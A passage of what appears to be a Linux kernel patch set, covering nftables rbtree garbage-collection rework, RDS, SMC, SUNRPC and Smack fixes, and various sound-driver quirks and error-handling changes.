+ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 			      struct nft_rbtree *priv,
+ 			      struct nft_rbtree_elem *rbe,
+@@ -222,11 +240,12 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
++	struct net *net = read_pnet(&set->net);
+ 	struct nft_rbtree_elem *rbe_prev;
+-	struct nft_set_gc_batch *gcb;
++	struct nft_trans_gc *gc;
+ 
+-	gcb = nft_set_gc_batch_check(set, NULL, GFP_ATOMIC);
+-	if (!gcb)
++	gc = nft_trans_gc_alloc(set, 0, GFP_ATOMIC);
++	if (!gc)
+ 		return -ENOMEM;
+ 
+ 	/* search for end interval coming before this element.
+@@ -244,17 +263,28 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 
+ 	if (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
++		nft_rbtree_gc_remove(net, set, priv, rbe_prev);
++
++		/* There is always room in this trans gc for this element,
++		 * memory allocation never actually happens, hence, the warning
++		 * splat in such case. No need to set NFT_SET_ELEM_DEAD_BIT,
++		 * this is synchronous gc which never fails.
++		 */
++		gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
++		if (WARN_ON_ONCE(!gc))
++			return -ENOMEM;
+ 
+-		rb_erase(&rbe_prev->node, &priv->root);
+-		atomic_dec(&set->nelems);
+-		nft_set_gc_batch_add(gcb, rbe_prev);
++		nft_trans_gc_elem_add(gc, rbe_prev);
+ 	}
+ 
+-	rb_erase(&rbe->node, &priv->root);
+-	atomic_dec(&set->nelems);
++	nft_rbtree_gc_remove(net, set, priv, rbe);
++	gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
++	if (WARN_ON_ONCE(!gc))
++		return -ENOMEM;
++
++	nft_trans_gc_elem_add(gc, rbe);
+ 
+-	nft_set_gc_batch_add(gcb, rbe);
+-	nft_set_gc_batch_complete(gcb);
++	nft_trans_gc_queue_sync_done(gc);
+ 
+ 	return 0;
+ }
+@@ -282,6 +312,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_rbtree_elem *rbe, *rbe_le = NULL, *rbe_ge = NULL;
+ 	struct rb_node *node, *next, *parent, **p, *first = NULL;
+ 	struct nft_rbtree *priv = nft_set_priv(set);
++	u8 cur_genmask = nft_genmask_cur(net);
+ 	u8 genmask = nft_genmask_next(net);
+ 	int d, err;
+ 
+@@ -327,8 +358,11 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 		if (!nft_set_elem_active(&rbe->ext, genmask))
+ 			continue;
+ 
+-		/* perform garbage collection to avoid bogus overlap reports. */
+-		if (nft_set_elem_expired(&rbe->ext)) {
++		/* perform garbage collection to avoid bogus overlap reports
++		 * but skip new elements in this transaction.
++		 */
++		if (nft_set_elem_expired(&rbe->ext) &&
++		    nft_set_elem_active(&rbe->ext, cur_genmask)) {
+ 			err = nft_rbtree_gc_elem(set, priv, rbe, genmask);
+ 			if (err < 0)
+ 				return err;
+@@ -482,7 +516,6 @@ static void nft_rbtree_activate(const struct net *net,
+ 	struct nft_rbtree_elem *rbe = elem->priv;
+ 
+ 	nft_set_elem_change_active(net, set, &rbe->ext);
+-	nft_set_elem_clear_busy(&rbe->ext);
+ }
+ 
+ static bool nft_rbtree_flush(const struct net *net,
+@@ -490,12 +523,9 @@ static bool nft_rbtree_flush(const struct net *net,
+ {
+ 	struct nft_rbtree_elem *rbe = priv;
+ 
+-	if (!nft_set_elem_mark_busy(&rbe->ext) ||
+-	    !nft_is_active(net, &rbe->ext)) {
+-		nft_set_elem_change_active(net, set, &rbe->ext);
+-		return true;
+-	}
+-	return false;
++	nft_set_elem_change_active(net, set, &rbe->ext);
++
++	return true;
+ }
+ 
+ static void *nft_rbtree_deactivate(const struct net *net,
+@@ -552,8 +582,6 @@ static void nft_rbtree_walk(const struct nft_ctx *ctx,
+ 
+ 		if (iter->count < iter->skip)
+ 			goto cont;
+-		if (nft_set_elem_expired(&rbe->ext))
+-			goto cont;
+ 		if (!nft_set_elem_active(&rbe->ext, iter->genmask))
+ 			goto cont;
+ 
+@@ -572,26 +600,42 @@ cont:
+ 
+ static void nft_rbtree_gc(struct work_struct *work)
+ {
+-	struct nft_rbtree_elem *rbe, *rbe_end = NULL, *rbe_prev = NULL;
+-	struct nft_set_gc_batch *gcb = NULL;
++	struct nft_rbtree_elem *rbe, *rbe_end = NULL;
++	struct nftables_pernet *nft_net;
+ 	struct nft_rbtree *priv;
++	struct nft_trans_gc *gc;
+ 	struct rb_node *node;
+ 	struct nft_set *set;
++	unsigned int gc_seq;
+ 	struct net *net;
+-	u8 genmask;
+ 
+ 	priv = container_of(work, struct nft_rbtree, gc_work.work);
+ 	set  = nft_set_container_of(priv);
+ 	net  = read_pnet(&set->net);
+-	genmask = nft_genmask_cur(net);
++	nft_net = nft_pernet(net);
++	gc_seq  = READ_ONCE(nft_net->gc_seq);
+ 
+-	write_lock_bh(&priv->lock);
+-	write_seqcount_begin(&priv->count);
++	if (nft_set_gc_is_pending(set))
++		goto done;
++
++	gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL);
++	if (!gc)
++		goto done;
++
++	read_lock_bh(&priv->lock);
+ 	for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) {
++
++		/* Ruleset has been updated, try later. */
++		if (READ_ONCE(nft_net->gc_seq) != gc_seq) {
++			nft_trans_gc_destroy(gc);
++			gc = NULL;
++			goto try_later;
++		}
++
+ 		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+ 
+-		if (!nft_set_elem_active(&rbe->ext, genmask))
+-			continue;
++		if (nft_set_elem_is_dead(&rbe->ext))
++			goto dead_elem;
+ 
+ 		/* elements are reversed in the rbtree for historical reasons,
+ 		 * from highest to lowest value, that is why end element is
+@@ -604,46 +648,35 @@ static void nft_rbtree_gc(struct work_struct *work)
+ 		if (!nft_set_elem_expired(&rbe->ext))
+ 			continue;
+ 
+-		if (nft_set_elem_mark_busy(&rbe->ext)) {
+-			rbe_end = NULL;
++		nft_set_elem_dead(&rbe->ext);
++
++		if (!rbe_end)
+ 			continue;
+-		}
+ 
+-		if (rbe_prev) {
+-			rb_erase(&rbe_prev->node, &priv->root);
+-			rbe_prev = NULL;
+-		}
+-		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
+-		if (!gcb)
+-			break;
++		nft_set_elem_dead(&rbe_end->ext);
+ 
+-		atomic_dec(&set->nelems);
+-		nft_set_gc_batch_add(gcb, rbe);
+-		rbe_prev = rbe;
++		gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
++		if (!gc)
++			goto try_later;
+ 
+-		if (rbe_end) {
+-			atomic_dec(&set->nelems);
+-			nft_set_gc_batch_add(gcb, rbe_end);
+-			rb_erase(&rbe_end->node, &priv->root);
+-			rbe_end = NULL;
+-		}
+-		node = rb_next(node);
+-		if (!node)
+-			break;
+-	}
+-	if (rbe_prev)
+-		rb_erase(&rbe_prev->node, &priv->root);
+-	write_seqcount_end(&priv->count);
+-	write_unlock_bh(&priv->lock);
++		nft_trans_gc_elem_add(gc, rbe_end);
++		rbe_end = NULL;
++dead_elem:
++		gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
++		if (!gc)
++			goto try_later;
+ 
+-	rbe = nft_set_catchall_gc(set);
+-	if (rbe) {
+-		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
+-		if (gcb)
+-			nft_set_gc_batch_add(gcb, rbe);
++		nft_trans_gc_elem_add(gc, rbe);
+ 	}
+-	nft_set_gc_batch_complete(gcb);
+ 
++	gc = nft_trans_gc_catchall_async(gc, gc_seq);
++
++try_later:
++	read_unlock_bh(&priv->lock);
++
++	if (gc)
++		nft_trans_gc_queue_async_done(gc);
++done:
+ 	queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
+ 			   nft_set_gc_interval(set));
+ }
+diff --git a/net/rds/rdma_transport.c b/net/rds/rdma_transport.c
+index d36f3f6b43510..b15cf316b23a2 100644
+--- a/net/rds/rdma_transport.c
++++ b/net/rds/rdma_transport.c
+@@ -86,11 +86,13 @@ static int rds_rdma_cm_event_handler_cmn(struct rdma_cm_id *cm_id,
+ 		break;
+ 
+ 	case RDMA_CM_EVENT_ADDR_RESOLVED:
+-		rdma_set_service_type(cm_id, conn->c_tos);
+-		rdma_set_min_rnr_timer(cm_id, IB_RNR_TIMER_000_32);
+-		/* XXX do we need to clean up if this fails? */
+-		ret = rdma_resolve_route(cm_id,
+-					 RDS_RDMA_RESOLVE_TIMEOUT_MS);
++		if (conn) {
++			rdma_set_service_type(cm_id, conn->c_tos);
++			rdma_set_min_rnr_timer(cm_id, IB_RNR_TIMER_000_32);
++			/* XXX do we need to clean up if this fails? */
++			ret = rdma_resolve_route(cm_id,
++						 RDS_RDMA_RESOLVE_TIMEOUT_MS);
++		}
+ 		break;
+ 
+ 	case RDMA_CM_EVENT_ROUTE_RESOLVED:
+diff --git a/net/smc/smc_stats.h b/net/smc/smc_stats.h
+index 84b7ecd8c05ca..4dbc237b7c19e 100644
+--- a/net/smc/smc_stats.h
++++ b/net/smc/smc_stats.h
+@@ -244,8 +244,9 @@ while (0)
+ #define SMC_STAT_SERV_SUCC_INC(net, _ini) \
+ do { \
+ 	typeof(_ini) i = (_ini); \
+-	bool is_v2 = (i->smcd_version & SMC_V2); \
+ 	bool is_smcd = (i->is_smcd); \
++	u8 version = is_smcd ? i->smcd_version : i->smcr_version; \
++	bool is_v2 = (version & SMC_V2); \
+ 	typeof(net->smc.smc_stats) smc_stats = (net)->smc.smc_stats; \
+ 	if (is_v2 && is_smcd) \
+ 		this_cpu_inc(smc_stats->smc[SMC_TYPE_D].srv_v2_succ_cnt); \
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index b0258507b236c..2b803383c7b31 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2462,8 +2462,7 @@ call_status(struct rpc_task *task)
+ 		goto out_exit;
+ 	}
+ 	task->tk_action = call_encode;
+-	if (status != -ECONNRESET && status != -ECONNABORTED)
+-		rpc_check_timeout(task);
++	rpc_check_timeout(task);
+ 	return;
+ out_exit:
+ 	rpc_call_rpcerror(task, status);
+@@ -2736,6 +2735,7 @@ out_msg_denied:
+ 	case rpc_autherr_rejectedverf:
+ 	case rpcsec_gsserr_credproblem:
+ 	case rpcsec_gsserr_ctxproblem:
++		rpcauth_invalcred(task);
+ 		if (!task->tk_cred_retry)
+ 			break;
+ 		task->tk_cred_retry--;
+@@ -2889,19 +2889,22 @@ static const struct rpc_call_ops rpc_cb_add_xprt_call_ops = {
+  * @clnt: pointer to struct rpc_clnt
+  * @xps: pointer to struct rpc_xprt_switch,
+  * @xprt: pointer struct rpc_xprt
+- * @dummy: unused
++ * @in_max_connect: pointer to the max_connect value for the passed in xprt transport
+  */
+ int rpc_clnt_test_and_add_xprt(struct rpc_clnt *clnt,
+ 		struct rpc_xprt_switch *xps, struct rpc_xprt *xprt,
+-		void *dummy)
++		void *in_max_connect)
+ {
+ 	struct rpc_cb_add_xprt_calldata *data;
+ 	struct rpc_task *task;
++	int max_connect = clnt->cl_max_connect;
+ 
+-	if (xps->xps_nunique_destaddr_xprts + 1 > clnt->cl_max_connect) {
++	if (in_max_connect)
++		max_connect = *(int *)in_max_connect;
++	if (xps->xps_nunique_destaddr_xprts + 1 > max_connect) {
+ 		rcu_read_lock();
+ 		pr_warn("SUNRPC: reached max allowed number (%d) did not add "
+-			"transport to server: %s\n", clnt->cl_max_connect,
++			"transport to server: %s\n", max_connect,
+ 			rpc_peeraddr2str(clnt, RPC_DISPLAY_ADDR));
+ 		rcu_read_unlock();
+ 		return -EINVAL;
+diff --git a/security/smack/smack.h b/security/smack/smack.h
+index e2239be7bd60a..aa15ff56ed6e7 100644
+--- a/security/smack/smack.h
++++ b/security/smack/smack.h
+@@ -120,6 +120,7 @@ struct inode_smack {
+ struct task_smack {
+ 	struct smack_known	*smk_task;	/* label for access control */
+ 	struct smack_known	*smk_forked;	/* label when forked */
++	struct smack_known	*smk_transmuted;/* label when transmuted */
+ 	struct list_head	smk_rules;	/* per task access rules */
+ 	struct mutex		smk_rules_lock;	/* lock for the rules */
+ 	struct list_head	smk_relabel;	/* transit allowed labels */
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index 67dcd31cd3f3d..cd6a03e945eb7 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -999,8 +999,9 @@ static int smack_inode_init_security(struct inode *inode, struct inode *dir,
+ 				     const struct qstr *qstr, const char **name,
+ 				     void **value, size_t *len)
+ {
++	struct task_smack *tsp = smack_cred(current_cred());
+ 	struct inode_smack *issp = smack_inode(inode);
+-	struct smack_known *skp = smk_of_current();
++	struct smack_known *skp = smk_of_task(tsp);
+ 	struct smack_known *isp = smk_of_inode(inode);
+ 	struct smack_known *dsp = smk_of_inode(dir);
+ 	int may;
+@@ -1009,20 +1010,34 @@ static int smack_inode_init_security(struct inode *inode, struct inode *dir,
+ 		*name = XATTR_SMACK_SUFFIX;
+ 
+ 	if (value && len) {
+-		rcu_read_lock();
+-		may = smk_access_entry(skp->smk_known, dsp->smk_known,
+-				       &skp->smk_rules);
+-		rcu_read_unlock();
++		/*
++		 * If equal, transmuting already occurred in
++		 * smack_dentry_create_files_as(). No need to check again.
++		 */
++		if (tsp->smk_task != tsp->smk_transmuted) {
++			rcu_read_lock();
++			may = smk_access_entry(skp->smk_known, dsp->smk_known,
++					       &skp->smk_rules);
++			rcu_read_unlock();
++		}
+ 
+ 		/*
+-		 * If the access rule allows transmutation and
+-		 * the directory requests transmutation then
+-		 * by all means transmute.
++		 * In addition to having smk_task equal to smk_transmuted,
++		 * if the access rule allows transmutation and the directory
++		 * requests transmutation then by all means transmute.
+ 		 * Mark the inode as changed.
+ 		 */
+-		if (may > 0 && ((may & MAY_TRANSMUTE) != 0) &&
+-		    smk_inode_transmutable(dir)) {
+-			isp = dsp;
++		if ((tsp->smk_task == tsp->smk_transmuted) ||
++		    (may > 0 && ((may & MAY_TRANSMUTE) != 0) &&
++		     smk_inode_transmutable(dir))) {
++			/*
++			 * The caller of smack_dentry_create_files_as()
++			 * should have overridden the current cred, so the
++			 * inode label was already set correctly in
++			 * smack_inode_alloc_security().
++			 */
++			if (tsp->smk_task != tsp->smk_transmuted)
++				isp = dsp;
+ 			issp->smk_flags |= SMK_INODE_CHANGED;
+ 		}
+ 
+@@ -1461,10 +1476,19 @@ static int smack_inode_getsecurity(struct user_namespace *mnt_userns,
+ 	struct super_block *sbp;
+ 	struct inode *ip = (struct inode *)inode;
+ 	struct smack_known *isp;
++	struct inode_smack *ispp;
++	size_t label_len;
++	char *label = NULL;
+ 
+-	if (strcmp(name, XATTR_SMACK_SUFFIX) == 0)
++	if (strcmp(name, XATTR_SMACK_SUFFIX) == 0) {
+ 		isp = smk_of_inode(inode);
+-	else {
++	} else if (strcmp(name, XATTR_SMACK_TRANSMUTE) == 0) {
++		ispp = smack_inode(inode);
++		if (ispp->smk_flags & SMK_INODE_TRANSMUTE)
++			label = TRANS_TRUE;
++		else
++			label = "";
++	} else {
+ 		/*
+ 		 * The rest of the Smack xattrs are only on sockets.
+ 		 */
+@@ -1486,13 +1510,18 @@ static int smack_inode_getsecurity(struct user_namespace *mnt_userns,
+ 			return -EOPNOTSUPP;
+ 	}
+ 
++	if (!label)
++		label = isp->smk_known;
++
++	label_len = strlen(label);
++
+ 	if (alloc) {
+-		*buffer = kstrdup(isp->smk_known, GFP_KERNEL);
++		*buffer = kstrdup(label, GFP_KERNEL);
+ 		if (*buffer == NULL)
+ 			return -ENOMEM;
+ 	}
+ 
+-	return strlen(isp->smk_known);
++	return label_len;
+ }
+ 
+ 
+@@ -4750,8 +4779,10 @@ static int smack_dentry_create_files_as(struct dentry *dentry, int mode,
+ 		 * providing access is transmuting use the containing
+ 		 * directory label instead of the process label.
+ 		 */
+-		if (may > 0 && (may & MAY_TRANSMUTE))
++		if (may > 0 && (may & MAY_TRANSMUTE)) {
+ 			ntsp->smk_task = isp->smk_inode;
++			ntsp->smk_transmuted = ntsp->smk_task;
++		}
+ 	}
+ 	return 0;
+ }
+diff --git a/sound/hda/intel-sdw-acpi.c b/sound/hda/intel-sdw-acpi.c
+index 5cb92f7ccbcac..b57d72ea4503f 100644
+--- a/sound/hda/intel-sdw-acpi.c
++++ b/sound/hda/intel-sdw-acpi.c
+@@ -23,7 +23,7 @@ static int ctrl_link_mask;
+ module_param_named(sdw_link_mask, ctrl_link_mask, int, 0444);
+ MODULE_PARM_DESC(sdw_link_mask, "Intel link mask (one bit per link)");
+ 
+-static bool is_link_enabled(struct fwnode_handle *fw_node, int i)
++static bool is_link_enabled(struct fwnode_handle *fw_node, u8 idx)
+ {
+ 	struct fwnode_handle *link;
+ 	char name[32];
+@@ -31,7 +31,7 @@ static bool is_link_enabled(struct fwnode_handle *fw_node, int i)
+ 
+ 	/* Find master handle */
+ 	snprintf(name, sizeof(name),
+-		 "mipi-sdw-link-%d-subproperties", i);
++		 "mipi-sdw-link-%hhu-subproperties", idx);
+ 
+ 	link = fwnode_get_named_child_node(fw_node, name);
+ 	if (!link)
+@@ -51,8 +51,8 @@ static int
+ sdw_intel_scan_controller(struct sdw_intel_acpi_info *info)
+ {
+ 	struct acpi_device *adev = acpi_fetch_acpi_dev(info->handle);
+-	int ret, i;
+-	u8 count;
++	u8 count, i;
++	int ret;
+ 
+ 	if (!adev)
+ 		return -EINVAL;
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 3226691ac923c..54f4b593a1158 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -2208,6 +2208,7 @@ static const struct snd_pci_quirk power_save_denylist[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2068, "Intel NUC7i3BNB", 0),
+ 	/* https://bugzilla.kernel.org/show_bug.cgi?id=198611 */
+ 	SND_PCI_QUIRK(0x17aa, 0x2227, "Lenovo X1 Carbon 3rd Gen", 0),
++	SND_PCI_QUIRK(0x17aa, 0x316e, "Lenovo ThinkCentre M70q", 0),
+ 	/* https://bugzilla.redhat.com/show_bug.cgi?id=1689623 */
+ 	SND_PCI_QUIRK(0x17aa, 0x367b, "Lenovo IdeaCentre B550", 0),
+ 	/* https://bugzilla.redhat.com/show_bug.cgi?id=1572975 */
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f70e0ad81607e..57e07aa4e136c 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9657,7 +9657,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1d1f, "ASUS ROG Strix G17 2023 (G713PV)", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
+-	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402ZA", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x16a3, "ASUS UX3402VA", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e11, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA502),
+ 	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e51, "ASUS Zephyrus M15", ALC294_FIXUP_ASUS_GU502_PINS),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 9a9571c3f08c0..533250efcbd83 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -213,6 +213,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21J6"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82TL"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82QF"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -220,6 +234,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "82V2"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82UG"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/cs42l42.c b/sound/soc/codecs/cs42l42.c
+index 2fefbcf7bd130..735061690ded0 100644
+--- a/sound/soc/codecs/cs42l42.c
++++ b/sound/soc/codecs/cs42l42.c
+@@ -2280,6 +2280,16 @@ int cs42l42_common_probe(struct cs42l42_private *cs42l42,
+ 
+ 	if (cs42l42->reset_gpio) {
+ 		dev_dbg(cs42l42->dev, "Found reset GPIO\n");
++
++		/*
++		 * ACPI can override the default GPIO state we requested
++		 * so ensure that we start with RESET low.
++		 */
++		gpiod_set_value_cansleep(cs42l42->reset_gpio, 0);
++
++		/* Ensure minimum reset pulse width */
++		usleep_range(10, 500);
++
+ 		gpiod_set_value_cansleep(cs42l42->reset_gpio, 1);
+ 	}
+ 	usleep_range(CS42L42_BOOT_TIME_US, CS42L42_BOOT_TIME_US * 2);
+diff --git a/sound/soc/codecs/rt5640.c b/sound/soc/codecs/rt5640.c
+index a7071d0a2562f..37ea4d854cb58 100644
+--- a/sound/soc/codecs/rt5640.c
++++ b/sound/soc/codecs/rt5640.c
+@@ -2562,10 +2562,9 @@ static void rt5640_enable_jack_detect(struct snd_soc_component *component,
+ 	if (jack_data && jack_data->use_platform_clock)
+ 		rt5640->use_platform_clock = jack_data->use_platform_clock;
+ 
+-	ret = devm_request_threaded_irq(component->dev, rt5640->irq,
+-					NULL, rt5640_irq,
+-					IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
+-					"rt5640", rt5640);
++	ret = request_irq(rt5640->irq, rt5640_irq,
++			  IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
++			  "rt5640", rt5640);
+ 	if (ret) {
+ 		dev_warn(component->dev, "Failed to reguest IRQ %d: %d\n", rt5640->irq, ret);
+ 		rt5640_disable_jack_detect(component);
+@@ -2618,14 +2617,14 @@ static void rt5640_enable_hda_jack_detect(
+ 
+ 	rt5640->jack = jack;
+ 
+-	ret = devm_request_threaded_irq(component->dev, rt5640->irq,
+-					NULL, rt5640_irq, IRQF_TRIGGER_RISING | IRQF_ONESHOT,
+-					"rt5640", rt5640);
++	ret = request_irq(rt5640->irq, rt5640_irq,
++			  IRQF_TRIGGER_RISING | IRQF_ONESHOT, "rt5640", rt5640);
+ 	if (ret) {
+ 		dev_warn(component->dev, "Failed to reguest IRQ %d: %d\n", rt5640->irq, ret);
+ 		rt5640->irq = -ENXIO;
+ 		return;
+ 	}
++	rt5640->irq_requested = true;
+ 
+ 	/* sync initial jack state */
+ 	queue_delayed_work(system_long_wq, &rt5640->jack_work, 0);
+diff --git a/sound/soc/fsl/imx-audmix.c b/sound/soc/fsl/imx-audmix.c
+index d8e99b263ab21..cbe24d5b4e46a 100644
+--- a/sound/soc/fsl/imx-audmix.c
++++ b/sound/soc/fsl/imx-audmix.c
+@@ -320,7 +320,7 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->cpu_mclk)) {
+ 		ret = PTR_ERR(priv->cpu_mclk);
+ 		dev_err(&cpu_pdev->dev, "failed to get DAI mclk1: %d\n", ret);
+-		return -EINVAL;
++		return ret;
+ 	}
+ 
+ 	priv->audmix_pdev = audmix_pdev;
+diff --git a/sound/soc/fsl/imx-pcm-rpmsg.c b/sound/soc/fsl/imx-pcm-rpmsg.c
+index 35049043e5322..933bac7ea1864 100644
+--- a/sound/soc/fsl/imx-pcm-rpmsg.c
++++ b/sound/soc/fsl/imx-pcm-rpmsg.c
+@@ -19,6 +19,7 @@
+ static struct snd_pcm_hardware imx_rpmsg_pcm_hardware = {
+ 	.info = SNDRV_PCM_INFO_INTERLEAVED |
+ 		SNDRV_PCM_INFO_BLOCK_TRANSFER |
++		SNDRV_PCM_INFO_BATCH |
+ 		SNDRV_PCM_INFO_MMAP |
+ 		SNDRV_PCM_INFO_MMAP_VALID |
+ 		SNDRV_PCM_INFO_NO_PERIOD_WAKEUP |
+diff --git a/sound/soc/fsl/imx-rpmsg.c b/sound/soc/fsl/imx-rpmsg.c
+index 4d99f4858a14f..76c6febf24990 100644
+--- a/sound/soc/fsl/imx-rpmsg.c
++++ b/sound/soc/fsl/imx-rpmsg.c
+@@ -88,6 +88,14 @@ static int imx_rpmsg_probe(struct platform_device *pdev)
+ 			    SND_SOC_DAIFMT_NB_NF |
+ 			    SND_SOC_DAIFMT_CBC_CFC;
+ 
++	/*
++	 * i.MX rpmsg sound cards work on codec slave mode. MCLK will be
++	 * disabled by CPU DAI driver in hw_free(). Some codec requires MCLK
++	 * present at power up/down sequence. So need to set ignore_pmdown_time
++	 * to power down codec immediately before MCLK is turned off.
++	 */
++	data->dai.ignore_pmdown_time = 1;
++
+ 	/* Optional codec node */
+ 	ret = of_parse_phandle_with_fixed_args(np, "audio-codec", 0, 0, &args);
+ 	if (ret) {
+diff --git a/sound/soc/intel/avs/boards/hdaudio.c b/sound/soc/intel/avs/boards/hdaudio.c
+index 073663ba140d0..a65939f30ac47 100644
+--- a/sound/soc/intel/avs/boards/hdaudio.c
++++ b/sound/soc/intel/avs/boards/hdaudio.c
+@@ -54,6 +54,9 @@ static int avs_create_dai_links(struct device *dev, struct hda_codec *codec, int
+ 			return -ENOMEM;
+ 
+ 		dl[i].codecs->name = devm_kstrdup(dev, cname, GFP_KERNEL);
++		if (!dl[i].codecs->name)
++			return -ENOMEM;
++
+ 		dl[i].codecs->dai_name = pcm->name;
+ 		dl[i].num_codecs = 1;
+ 		dl[i].num_cpus = 1;
+diff --git a/sound/soc/meson/axg-spdifin.c b/sound/soc/meson/axg-spdifin.c
+index e2cc4c4be7586..97e81ec4a78ce 100644
+--- a/sound/soc/meson/axg-spdifin.c
++++ b/sound/soc/meson/axg-spdifin.c
+@@ -112,34 +112,6 @@ static int axg_spdifin_prepare(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ 
+-static int axg_spdifin_startup(struct snd_pcm_substream *substream,
+-			       struct snd_soc_dai *dai)
+-{
+-	struct axg_spdifin *priv = snd_soc_dai_get_drvdata(dai);
+-	int ret;
+-
+-	ret = clk_prepare_enable(priv->refclk);
+-	if (ret) {
+-		dev_err(dai->dev,
+-			"failed to enable spdifin reference clock\n");
+-		return ret;
+-	}
+-
+-	regmap_update_bits(priv->map, SPDIFIN_CTRL0, SPDIFIN_CTRL0_EN,
+-			   SPDIFIN_CTRL0_EN);
+-
+-	return 0;
+-}
+-
+-static void axg_spdifin_shutdown(struct snd_pcm_substream *substream,
+-				 struct snd_soc_dai *dai)
+-{
+-	struct axg_spdifin *priv = snd_soc_dai_get_drvdata(dai);
+-
+-	regmap_update_bits(priv->map, SPDIFIN_CTRL0, SPDIFIN_CTRL0_EN, 0);
+-	clk_disable_unprepare(priv->refclk);
+-}
+-
+ static void axg_spdifin_write_mode_param(struct regmap *map, int mode,
+ 					 unsigned int val,
+ 					 unsigned int num_per_reg,
+@@ -251,25 +223,38 @@ static int axg_spdifin_dai_probe(struct snd_soc_dai *dai)
+ 	ret = axg_spdifin_sample_mode_config(dai, priv);
+ 	if (ret) {
+ 		dev_err(dai->dev, "mode configuration failed\n");
+-		clk_disable_unprepare(priv->pclk);
+-		return ret;
++		goto pclk_err;
+ 	}
+ 
++	ret = clk_prepare_enable(priv->refclk);
++	if (ret) {
++		dev_err(dai->dev,
++			"failed to enable spdifin reference clock\n");
++		goto pclk_err;
++	}
++
++	regmap_update_bits(priv->map, SPDIFIN_CTRL0, SPDIFIN_CTRL0_EN,
++			   SPDIFIN_CTRL0_EN);
++
+ 	return 0;
++
++pclk_err:
++	clk_disable_unprepare(priv->pclk);
++	return ret;
+ }
+ 
+ static int axg_spdifin_dai_remove(struct snd_soc_dai *dai)
+ {
+ 	struct axg_spdifin *priv = snd_soc_dai_get_drvdata(dai);
+ 
++	regmap_update_bits(priv->map, SPDIFIN_CTRL0, SPDIFIN_CTRL0_EN, 0);
++	clk_disable_unprepare(priv->refclk);
+ 	clk_disable_unprepare(priv->pclk);
+ 	return 0;
+ }
+ 
+ static const struct snd_soc_dai_ops axg_spdifin_ops = {
+ 	.prepare	= axg_spdifin_prepare,
+-	.startup	= axg_spdifin_startup,
+-	.shutdown	= axg_spdifin_shutdown,
+ };
+ 
